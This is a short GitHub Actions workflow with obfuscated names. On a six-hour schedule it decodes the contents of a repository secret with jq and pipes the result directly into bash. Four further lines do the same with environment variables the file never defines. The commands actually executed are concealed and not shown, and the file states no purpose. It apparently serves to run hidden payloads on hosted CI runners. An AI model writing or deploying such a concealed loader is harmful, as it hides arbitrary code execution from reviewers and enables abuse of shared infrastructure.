name: qiaofengshang7890

on:
  workflow_dispatch:
  schedule:
    - cron: '33 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qiaofengshang7890
        env:
          nmxxe8: ${{ secrets.nmxxe8 }}
        run: |
          echo $nmxxe8 | jq -r .bqncw0 | /bin/bash
          echo $pka20310 | jq -r .fcv05097 | /bin/bash
          echo $ixw53465 | jq -r .xzl178 | /bin/bash
          echo $wzflw7923 | jq -r .eu9928 | /bin/bash
          echo $b3 | jq -r .mae7216 | /bin/bash

